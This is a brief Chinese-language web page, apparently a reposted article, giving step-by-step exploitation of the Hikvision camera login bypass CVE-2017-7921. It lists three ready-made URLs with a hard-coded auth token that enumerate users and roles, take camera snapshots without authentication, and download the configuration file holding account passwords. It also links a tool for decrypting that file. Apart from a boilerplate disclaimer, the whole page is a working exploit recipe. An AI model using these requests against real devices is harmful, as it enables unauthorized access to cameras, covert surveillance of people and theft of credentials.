海康威視(Hikvision)登陸繞過CVE-2017-7921


海康威視(Hikvision)登陸繞過CVE-2017-7921

1、檢索所有用戶及其角色的列表

http://ip/Security/users?auth=YWRtaW46MTEK

2、在沒有身份驗證的情況下獲取攝像頭快照

http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK

3、下載攝像頭配置賬號密碼文件

http://ip/System/configurationFile?auth=YWRtaW46MTEK

4、下載后解密即可,二進制文件使用HEX編輯器查看

解密軟件下載地址

https://github.com/WormChickenWizard/hikvision-decrypter


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM